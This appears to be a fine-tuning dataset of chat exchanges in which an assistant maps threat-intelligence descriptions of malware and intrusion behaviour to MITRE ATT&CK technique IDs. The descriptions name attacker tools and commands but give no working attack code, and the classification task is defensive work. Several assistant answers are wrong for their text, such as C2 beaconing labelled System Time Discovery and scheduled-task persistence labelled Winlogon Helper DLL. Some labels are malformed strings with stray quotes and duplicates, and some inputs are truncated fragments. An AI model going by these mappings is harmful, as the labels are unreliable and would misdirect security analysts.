- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain a process list from the victim."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy has a command to delete files and directories."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed has automatically collected data from USB drives, keystrokes, and screen images before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LoudMiner used SCP to update the miner from the C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WannaCry will attempt to determine the local network segment it is a part of."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We discovered that TeamTNT gained initial access with the Hildegard malware by executing commands on kubelets that allow anonymous access. This was achieved by accessing the kubelet’s run command API and executing commands on running containers"
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services', 'T1609 - Kubernetes Exec Into Container', 'T1609 - Kubernetes Exec Into Container"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLEAD can harvest saved credentials from browsers such as Google Chrome, Microsoft Internet Explorer, and Mozilla Firefox."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Higaisa used Base64 encoded compressed payloads."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used VBScript to gather information about a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When one PlugX succeeds to infect a host, it then accesses to every IP address in the local network one-by-one and communicate with any connectable nodes, using one of the following protocols listed in Table 2"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery', 'T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At periodic offsets, the bootloader overwrites sectors of an infected host’s entire hard drive, with a message similar to the ransom note, padded with additional bytes (Figure 2"
- },
- {
- "role": "assistant",
- "content": "T1561.001 - Disk Content Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can upload files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ccf32 has used `cmd.exe` for archiving data and deleting files."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Anchor has obfuscated code with stack strings and string encryption."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has obfuscated code using base64 and gzip compression."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This new version of SolidBit ransomware is a .NET compiled binary (Figure 7). After opening Runtime64.exe using the debugger and .NET assembly editor DnSpy, we found that this file was obfuscated"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Action RAT has the ability to collect the hostname, OS version, and OS architecture of an infected host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A technical relevant fact about this campaign is the use of Python embedded into Windows executables of the malware. There is no multi-platform support as the code is heavily Windows-oriented (use of libraries). However, we discovered several clues that the attackers prepared the infrastructure for Mac OS X and Unix victims as well. In addition to Windows components, we also found a mobile (Android) component"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DEATHRANSOM is written in C while the other two families are written in C++. DEATHRANSOM uses a distinct series of do/while loops to enumerate through network resources, logical drives, and directories"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 used account credentials they obtained to attempt access to Group Managed Service Account (gMSA) passwords."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can collect data from a local system."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After an initial dormant period of up to two weeks, it retrieves and executes commands, called “Jobs”, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. TEARDROP and BEACON Malware Used . Multiple SUNBURST samples have been recovered, delivering different payloads. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. The credentials used for lateral movement were always different from those used for remote access. Detection Opportunity . Organizations can use HX’s LogonTracker module to graph all logon activity and analyze systems displaying a one-to-many relationship between source systems and accounts. After an initial dormant period of up to two weeks, it retrieves and executes commands, called “Jobs”, that include the ability to transfer and execute files, profile the system, and disable system services. The userID is encoded via a custom XOR scheme after the MD5 is calculated. Commands are extracted from HTTP response bodies by searching for HEX strings using the following regular expression: \"\\{[0-9a-f-]{36}\\}\"||\"[0-9a-f]{32}\"||\"[0-9a-f]{16}\". Command data is spread across multiple strings that are disguised as GUID and HEX strings. The extracted message is single-byte XOR decoded using the first byte of the message, and this is then DEFLATE decompressed"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "S-Type may create the file \"%HOMEPATH%\\Start Menu\\Programs\\Startup\\Realtek {Unique Identifier}.lnk\", which points to the malicious `msdtc.exe` file already created in the `%CommonFiles%` directory."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can execute PowerShell scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Here’s a python code to decode"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Campaign Code and Compile Time Correlation In some cases, there is a close proximity of the compile time of a CARBANAK sample to the month specified in a particular campaign code"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream can upload files from victims' machines."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Honeybee, various implants used batch scripting and `cmd.exe` for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak can use the Registry for code updates and to collect credentials."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has subset groups like Bluenoroff who have used cryptocurrency mining software on victim machines."
- },
- {
- "role": "assistant",
- "content": "T1496 - Resource Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN10 has moved laterally using the Local Administrator account."
- },
- {
- "role": "assistant",
- "content": "T1078.003 - Valid Accounts: Local Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Axiom has used digital certificates to deliver malware."
- },
- {
- "role": "assistant",
- "content": "T1553 - Subvert Trust Controls"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has searched network shares to access sensitive documents."
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can disconnect previously connected remote drives."
- },
- {
- "role": "assistant",
- "content": "T1070.005 - Indicator Removal on Host: Network Share Connection Removal"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This command will automatically set the DNS type to use for actual C2 $showconfig Uploads the current configuration of the payload to the C2 slpx:\\d+ Sets the sleep interval between outbound DNS requests $fileUpload Downloads contents from the C2 server and writes them to a specified file Table 3 Commands available to payload Campaign Analysis The following domains are configured within the payload to be used as C2s"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Olympic Destroyer will attempt to clear the System and Security event logs using \"wevtutil\"."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The purpose is to download and execute an additional payload hosted on a compromised website: NavRAT"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BabyShark has executed the \"whoami\" command."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MoonWind can execute commands via an interactive command shell. MoonWind uses batch scripts for various purposes, including to restart and uninstall itself."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman can delete shadow volumes using \"vssadmin.exe\"."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used malware obtained after compromising other threat actors, such as OilRig."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used compromised email accounts to send credential phishing emails."
- },
- {
- "role": "assistant",
- "content": "T1586.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In our case study, approximately two minutes after Cobalt Strike activity started, a tool to enumerate an AD environment appeared on the infected host at C:\\ProgramData\\AdFind.exe."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool', 'T1595 - Active Scanning"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has staged stolen data locally on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Drovorub can use kernel modules to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.006 - Boot or Logon Autostart Execution: Kernel Modules and Extensions"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbon has a command to inject code into a process."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GreyEnergy enumerates all Windows services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When the trojan starts up it will attempt to install a scheduled task with the name of “Java Maintenance64” to keep itself running."
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As part of its initialization, the implant gathers basic system information and sends it to its hardcoded control server 203.131.222.83 using SSL over port 443"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used cmd.exe to execute commmands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has used masscan to search for open Docker API ports and Kubernetes clusters. TeamTNT has also used malware that utilizes zmap and zgrab to search for vulnerable services in cloud environments."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The CALENDAR malware communicates through the use of events in Google Calendar."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 used Kerberos ticket attacks for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication"
- },
- {
- "role": "assistant",
- "content": "T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The latter PowerShell injects a shellcode into its own process using well-known CreateThread and VirtualAlloc techniques: SHELLCODE: The shellcode phase of this attack is unique and demonstrates the constantly advancing abilities of attackers"
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The GoldMax malware was discovered persisting on networks as a scheduled task impersonating systems management software. In the instances it was encountered, the scheduled task was named after software that existed in the environment, and pointed to a subfolder in ProgramData named after that software, with a similar executable name. The executable, however, was the GoldMax implant"
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service', 'T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses port 443 for C2."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET uses the ssh launchdaemon to elevate privileges, bypass system controls, and enable remote access to the victim."
- },
- {
- "role": "assistant",
- "content": "T1543.004 - Create or Modify System Process: Launch Daemon"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers then attempt to gain root access to the server by setting up a local privileged user named ‘hilde’ on the host server and use it in order to connect back via SSH"
- },
- {
- "role": "assistant",
- "content": "T1021.004 - Remote Services: SSH"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can use advanced web injects to steal web banking credentials."
- },
- {
- "role": "assistant",
- "content": "T1185 - Browser Session Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At the end of the encryption process, Pay2Key will also terminate the MS SQL service using the following command net stop mssqlserver > nul in order to release the files locked by the service"
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elderwood has used exploitation of endpoint software, including Microsoft Internet Explorer Adobe Flash vulnerabilities, to gain execution. They have also used zero-day exploits."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We also analyzed further Gamaredon tools that have the ability to inject malicious macros and remote templates into existing Office documents. Tools linked to Gamaredon and discussed in this blogpost are detected as variants of MSIL/Pterodo, Win32/Pterodo or Win64/Pterodo by ESET’s products. Contrary to other APT groups, the Gamaredon group seems to make no effort in trying to stay under the radar. It also saves to disk the malicious OTM file (Outlook VBA project) that contains a macro, the malicious email attachment and, in some cases, a list of recipients that the emails should be sent to. Office macro injection module – CodeBuilder . We analyzed different variants of malicious modules used by the Gamaredon group to inject malicious macros or remote templates into documents already present on the compromised system. Module updates . Interestingly, some of the custom tools described in Palo Alto Networks’ 2017 blogpost on Gamaredon are still being updated and in use today. C# compiler module . This .NET executable, similar to many other tools used by the Gamaredon group, uses obfuscation techniques such as junk code insertion and string obfuscation. As with many other tools used by the Gamaredon group, they come in four different coding languages: C/C++, C#, batch file and VBScript. Quality of execution . We were able to collect numerous different samples of malicious scripts, executables and documents used by the Gamaredon group throughout their campaigns. Conclusion . Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilGrab has the capability to capture video from a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LookBack can enumerate services on the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
